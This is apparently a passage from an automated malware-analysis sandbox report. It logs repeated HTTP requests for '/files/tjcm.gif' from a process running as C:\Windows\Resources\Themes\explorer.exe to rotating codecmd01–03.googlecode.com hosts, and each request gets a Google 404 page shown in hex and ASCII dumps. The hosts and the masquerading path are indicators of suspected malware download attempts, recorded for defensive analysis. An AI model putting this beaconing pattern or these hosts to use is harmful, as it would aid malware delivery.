                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:20.552202940 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:20 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:20.552244902 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      120192.168.2.54983474.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:20.946141958 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:21.639198065 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:21 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:21.639219046 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      121192.168.2.549835108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:21.910171032 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:22.614253044 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:22 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:22.614279032 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      122192.168.2.549836108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:23.041939974 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:23.740617037 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:23 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:23.740771055 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      123192.168.2.54983774.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:24.187287092 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:24.961136103 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:24 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:24.961268902 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      124192.168.2.549838108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:25.363039017 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:26.045658112 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:25 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:26.046242952 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      125192.168.2.549839108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:26.488761902 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:27.228132010 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:27 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:27.228152990 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      126192.168.2.54984074.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:27.642781973 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:28.334486961 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:28 GMT
